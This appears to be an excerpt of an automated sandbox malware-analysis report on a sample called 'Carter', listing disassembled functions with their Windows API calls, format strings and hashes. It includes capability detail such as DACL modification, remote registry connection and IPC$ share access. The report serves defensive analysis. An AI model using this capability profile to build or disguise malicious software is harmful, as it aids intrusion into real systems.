                                                                        • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000002,?,0102F8B8,00000001,0000138C,00000001,00000002,00000001,?,01053FF9,00000002), ref: 0104009A
                                                                        • LoadStringW.USER32(00000000,?,0102F8B8,00000001), ref: 010400A3
                                                                          • Part of subcall function 00FF1A36: _memmove.LIBCMT ref: 00FF1A77
                                                                        • GetModuleHandleW.KERNEL32(00000000,010A7310,?,00000FFF,?,?,0102F8B8,00000001,0000138C,00000001,00000002,00000001,?,01053FF9,00000002,00000001), ref: 010400C5
                                                                        • LoadStringW.USER32(00000000,?,0102F8B8,00000001), ref: 010400C8
                                                                        • __swprintf.LIBCMT ref: 01040118
                                                                        • __swprintf.LIBCMT ref: 01040129
                                                                        • _wprintf.LIBCMT ref: 010401D2
                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 010401E9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                        • API String ID: 984253442-2268648507
                                                                        • Opcode ID: b5d6e7aeb90158a4bdeb8414d625ccee13d14f2f20ee3433c6bdc6fe27477960
                                                                        • Instruction ID: 947f19611a9485f9bfd55a15667549e5050cbbb51db9da6119648d072016b76d
                                                                        • Opcode Fuzzy Hash: b5d6e7aeb90158a4bdeb8414d625ccee13d14f2f20ee3433c6bdc6fe27477960
                                                                        • Instruction Fuzzy Hash: D3415CB290011DAADF15EBE0CD92DFEB778BF14340F500165F645B60A5DA796F08DBA0
                                                                        Function 0104A995 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00FE4D37: __itow.LIBCMT ref: 00FE4D62
                                                                          • Part of subcall function 00FE4D37: __swprintf.LIBCMT ref: 00FE4DAC
                                                                        • CharLowerBuffW.USER32(?,?), ref: 0104AA0E
                                                                        • GetDriveTypeW.KERNEL32 ref: 0104AA5B
                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0104AAA3
                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0104AADA
                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0104AB08
                                                                          • Part of subcall function 00FF1821: _memmove.LIBCMT ref: 00FF185B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                        • API String ID: 2698844021-4113822522
                                                                        • Opcode ID: a95831fde23dae308a74d40c037febdb9a9e291d77db064fff26d2f2f5452230
                                                                        • Instruction ID: 67633679572adf1f6b2c960bc825abd4d1bc850857398659f9381b59482f3fd7
                                                                        • Opcode Fuzzy Hash: a95831fde23dae308a74d40c037febdb9a9e291d77db064fff26d2f2f5452230
                                                                        • Instruction Fuzzy Hash: 8B5189B1204209DFC710EF25CC9196AB7E4FF88758F00496DF89697261DB35AE06DB92
                                                                        Function 0104A832 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0104A852
                                                                        • __swprintf.LIBCMT ref: 0104A874
                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 0104A8B1
                                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0104A8D6
                                                                        • _memset.LIBCMT ref: 0104A8F5
                                                                        • _wcsncpy.LIBCMT ref: 0104A931
                                                                        • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0104A966
                                                                        • CloseHandle.KERNEL32(00000000), ref: 0104A971
                                                                        • RemoveDirectoryW.KERNEL32(?), ref: 0104A97A
                                                                        • CloseHandle.KERNEL32(00000000), ref: 0104A984
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                        • String ID: :$\$\??\%s
                                                                        • API String ID: 2733774712-3457252023
                                                                        • Opcode ID: a424bdd78d7f3e97500b9b9d7aa43981ddbd18f46f61627fc455ec1e0189e6b8
                                                                        • Instruction ID: 4ee32b8435a40896e2392ce3dd4c84cd2ad5b4b6a3c5a2affb06c109360db478
                                                                        • Opcode Fuzzy Hash: a424bdd78d7f3e97500b9b9d7aa43981ddbd18f46f61627fc455ec1e0189e6b8
                                                                        • Instruction Fuzzy Hash: A83107B594010AABEB219FA4DC88FEF77BCEF89700F1041BAF649D6094E77496448B24
                                                                        Function 0106C0A5 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0106982C,?,?), ref: 0106C0C8
                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0106982C,?,?,00000000,?), ref: 0106C0DF
                                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0106982C,?,?,00000000,?), ref: 0106C0EA
                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,0106982C,?,?,00000000,?), ref: 0106C0F7
                                                                        • GlobalLock.KERNEL32(00000000), ref: 0106C100
                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0106982C,?,?,00000000,?), ref: 0106C10F
                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0106C118
                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,0106982C,?,?,00000000,?), ref: 0106C11F
                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0106982C,?,?,00000000,?), ref: 0106C130
                                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,01073C7C,?), ref: 0106C149
                                                                        • GlobalFree.KERNEL32(00000000), ref: 0106C159
                                                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 0106C17D
                                                                        • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0106C1A8
                                                                        • DeleteObject.GDI32(00000000), ref: 0106C1D0
                                                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0106C1E6
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                        • String ID:
                                                                        • API String ID: 3840717409-0
                                                                        • Opcode ID: 0f2d8d9b5e84652089205af7aebdad936257de5bbe9f0ef248ff3d4f942f283e
                                                                        • Instruction ID: de27acf005fdcb5b04c3b8ce3028ee761fb676cf6fb8d84113781944d9cb848a
                                                                        • Opcode Fuzzy Hash: 0f2d8d9b5e84652089205af7aebdad936257de5bbe9f0ef248ff3d4f942f283e
                                                                        • Instruction Fuzzy Hash: 21416D75A00208EFEB219F65DD48EAF7BBCEF8A711F004158F986EB254CB359941CB60
                                                                        Function 0106C854 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00FE29E2: GetWindowLongW.USER32(?,000000EB), ref: 00FE29F3
                                                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0106C8A4
                                                                        • GetFocus.USER32 ref: 0106C8B4
                                                                        • GetDlgCtrlID.USER32(00000000), ref: 0106C8BF
                                                                        • _memset.LIBCMT ref: 0106C9EA
                                                                        • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0106CA15
                                                                        • GetMenuItemCount.USER32(?), ref: 0106CA35
                                                                        • GetMenuItemID.USER32(?,00000000), ref: 0106CA48
                                                                        • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0106CA7C
                                                                        • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0106CAC4
                                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0106CAFC
                                                                        • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0106CB31
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                        • String ID: 0
                                                                        • API String ID: 1296962147-4108050209
                                                                        • Opcode ID: 4a1a90638bda5fdd3add460f123e1c905eee74f9fd3665ed3f70729dcc444c49
                                                                        • Instruction ID: 3c0b7efbf99a2dc962f32fb8903165d4d8e8ef170d4834ebf68dd4adc2612aa9
                                                                        • Opcode Fuzzy Hash: 4a1a90638bda5fdd3add460f123e1c905eee74f9fd3665ed3f70729dcc444c49
                                                                        • Instruction Fuzzy Hash: C8817B706083419FE761CF18CA84AAFBBE8FB88354F00495DF9D9A3281D771D905CBA2
                                                                        Function 01038ACA Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 01038E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 01038E3C
                                                                          • Part of subcall function 01038E20: GetLastError.KERNEL32(?,01038900,?,?,?), ref: 01038E46
                                                                          • Part of subcall function 01038E20: GetProcessHeap.KERNEL32(00000008,?,?,01038900,?,?,?), ref: 01038E55
                                                                          • Part of subcall function 01038E20: HeapAlloc.KERNEL32(00000000,?,01038900,?,?,?), ref: 01038E5C
                                                                          • Part of subcall function 01038E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 01038E73
                                                                          • Part of subcall function 01038EBD: GetProcessHeap.KERNEL32(00000008,01038916,00000000,00000000,?,01038916,?), ref: 01038EC9
                                                                          • Part of subcall function 01038EBD: HeapAlloc.KERNEL32(00000000,?,01038916,?), ref: 01038ED0
                                                                          • Part of subcall function 01038EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,01038916,?), ref: 01038EE1
                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 01038B2E
                                                                        • _memset.LIBCMT ref: 01038B43
                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 01038B62
                                                                        • GetLengthSid.ADVAPI32(?), ref: 01038B73
                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 01038BB0
                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 01038BCC
                                                                        • GetLengthSid.ADVAPI32(?), ref: 01038BE9
                                                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 01038BF8
                                                                        • HeapAlloc.KERNEL32(00000000), ref: 01038BFF
                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 01038C20
                                                                        • CopySid.ADVAPI32(00000000), ref: 01038C27
                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 01038C58
                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 01038C7E
                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 01038C92
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                        • String ID:
                                                                        • API String ID: 3996160137-0
                                                                        • Opcode ID: 6824f0b58ebcfe2a71d982b04a0a2b20b8f21c705c15312c89d70fae281bca2c
                                                                        • Instruction ID: 1c8c112a2f99b5b372f738abef4cce4a2a5e232fc88cbf3c175ce4d4b34a5a90
                                                                        • Opcode Fuzzy Hash: 6824f0b58ebcfe2a71d982b04a0a2b20b8f21c705c15312c89d70fae281bca2c
                                                                        • Instruction Fuzzy Hash: 08617E7190020AAFDF11DF94DC44EEEBBB9FF55310F04829AFA95A7284DB759A00CB60
                                                                        Function 01057A04 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetDC.USER32(00000000), ref: 01057A79
                                                                        • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 01057A85
                                                                        • CreateCompatibleDC.GDI32(?), ref: 01057A91
                                                                        • SelectObject.GDI32(00000000,?), ref: 01057A9E
                                                                        • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 01057AF2
                                                                        • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 01057B2E
                                                                        • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 01057B52
                                                                        • SelectObject.GDI32(00000006,?), ref: 01057B5A
                                                                        • DeleteObject.GDI32(?), ref: 01057B63
                                                                        • DeleteDC.GDI32(00000006), ref: 01057B6A
                                                                        • ReleaseDC.USER32(00000000,?), ref: 01057B75
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                        • String ID: (
                                                                        • API String ID: 2598888154-3887548279
                                                                        • Opcode ID: aedef1644cbefe6ebadd44b5ef283ea0976540f2805a03b6530e0afb847b647b
                                                                        • Instruction ID: 7f97db4664a2877d5113823c7a43a65502c4239f34d020dd9c78153832a477cc
                                                                        • Opcode Fuzzy Hash: aedef1644cbefe6ebadd44b5ef283ea0976540f2805a03b6530e0afb847b647b
                                                                        • Instruction Fuzzy Hash: 49515D71900309EFDB65CFA8C884EAFBBB9FF49310F14851DF989A7254D775A9408BA0
                                                                        Function 0104A48D Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 156COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 0104A4D4
                                                                          • Part of subcall function 00FF1A36: _memmove.LIBCMT ref: 00FF1A77
                                                                        • LoadStringW.USER32(?,?,00000FFF,?), ref: 0104A4F6
                                                                        • __swprintf.LIBCMT ref: 0104A54F
                                                                        • __swprintf.LIBCMT ref: 0104A568
                                                                        • _wprintf.LIBCMT ref: 0104A61E
                                                                        • _wprintf.LIBCMT ref: 0104A63C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: LoadString__swprintf_wprintf$_memmove
                                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                        • API String ID: 311963372-2391861430
                                                                        • Opcode ID: c8e553c4bc707a2987a24c444ed0621e6fe86de2a00d27d68f73642d06d183f4
                                                                        • Instruction ID: 93e0c56018ccd376ddee8b9b8b50877c0caa1b66f9e9a66a3dff12e6126ba514
                                                                        • Opcode Fuzzy Hash: c8e553c4bc707a2987a24c444ed0621e6fe86de2a00d27d68f73642d06d183f4
                                                                        • Instruction Fuzzy Hash: 4F518DB1940119EBDF25EBE0CD81EEEB778BF18340F104165F645B21A1DB3A6E48EB90
                                                                        Function 01049710 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 0104951A: __time64.LIBCMT ref: 01049524
                                                                          • Part of subcall function 00FF4A8C: _fseek.LIBCMT ref: 00FF4AA4
                                                                        • __wsplitpath.LIBCMT ref: 010497EF
                                                                          • Part of subcall function 0100431E: __wsplitpath_helper.LIBCMT ref: 0100435E
                                                                        • _wcscpy.LIBCMT ref: 01049802
                                                                        • _wcscat.LIBCMT ref: 01049815
                                                                        • __wsplitpath.LIBCMT ref: 0104983A
                                                                        • _wcscat.LIBCMT ref: 01049850
                                                                        • _wcscat.LIBCMT ref: 01049863
                                                                          • Part of subcall function 01049560: _memmove.LIBCMT ref: 01049599
                                                                          • Part of subcall function 01049560: _memmove.LIBCMT ref: 010495A8
                                                                        • _wcscmp.LIBCMT ref: 010497AA
                                                                          • Part of subcall function 01049CF1: _wcscmp.LIBCMT ref: 01049DE1
                                                                          • Part of subcall function 01049CF1: _wcscmp.LIBCMT ref: 01049DF4
                                                                        • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 01049A0D
                                                                        • _wcsncpy.LIBCMT ref: 01049A80
                                                                        • DeleteFileW.KERNEL32(?,?), ref: 01049AB6
                                                                        • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 01049ACC
                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 01049ADD
                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 01049AEF
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                        • String ID:
                                                                        • API String ID: 1500180987-0
                                                                        • Opcode ID: 3580501119801ea2c3b4f7f36b9e6da3c3297feaa910a76b4c9d1adf254e5487
                                                                        • Instruction ID: c1a867a9391136aba90e8ede4bc06341055de4eee525a5265affa67ef275f00a
                                                                        • Opcode Fuzzy Hash: 3580501119801ea2c3b4f7f36b9e6da3c3297feaa910a76b4c9d1adf254e5487
                                                                        • Instruction Fuzzy Hash: 0DC12BB1D0021DABDF21DF95CC84AEFB7BDAF59314F0040BAE649E6150EB349A848F65
                                                                        Function 00FF5BD7 Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 00FF5BF1
                                                                        • GetMenuItemCount.USER32(010A7890), ref: 01030E7B
                                                                        • GetMenuItemCount.USER32(010A7890), ref: 01030F2B
                                                                        • GetCursorPos.USER32(?), ref: 01030F6F
                                                                        • SetForegroundWindow.USER32(00000000), ref: 01030F78
                                                                        • TrackPopupMenuEx.USER32(010A7890,00000000,?,00000000,00000000,00000000), ref: 01030F8B
                                                                        • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 01030F97
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                        • String ID:
                                                                        • API String ID: 2751501086-0
                                                                        • Opcode ID: df4507ba94f7d1e53b06c9f3c1bfbad295c29c635bbadee767c3deaa0d889d5a
                                                                        • Instruction ID: 1648345fff43347ff5ff7c0445cecd659eab568d2fc725901f24880bd09e13c3
                                                                        • Opcode Fuzzy Hash: df4507ba94f7d1e53b06c9f3c1bfbad295c29c635bbadee767c3deaa0d889d5a
                                                                        • Instruction Fuzzy Hash: 71710370701709BFFB219B28DC88FAABFA8FF45764F100256F654AA1D4C7B16850DBA0
                                                                        Function 010383FA Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00FF1821: _memmove.LIBCMT ref: 00FF185B
                                                                        • _memset.LIBCMT ref: 01038489
                                                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 010384BE
                                                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 010384DA
                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 010384F6
                                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 01038520
                                                                        • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 01038548
                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 01038553
                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 01038558
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                        • API String ID: 1411258926-22481851
                                                                        • Opcode ID: 1797f436918ef2476b866235269cc90a012c2777c7f8b9511516745e61820b58
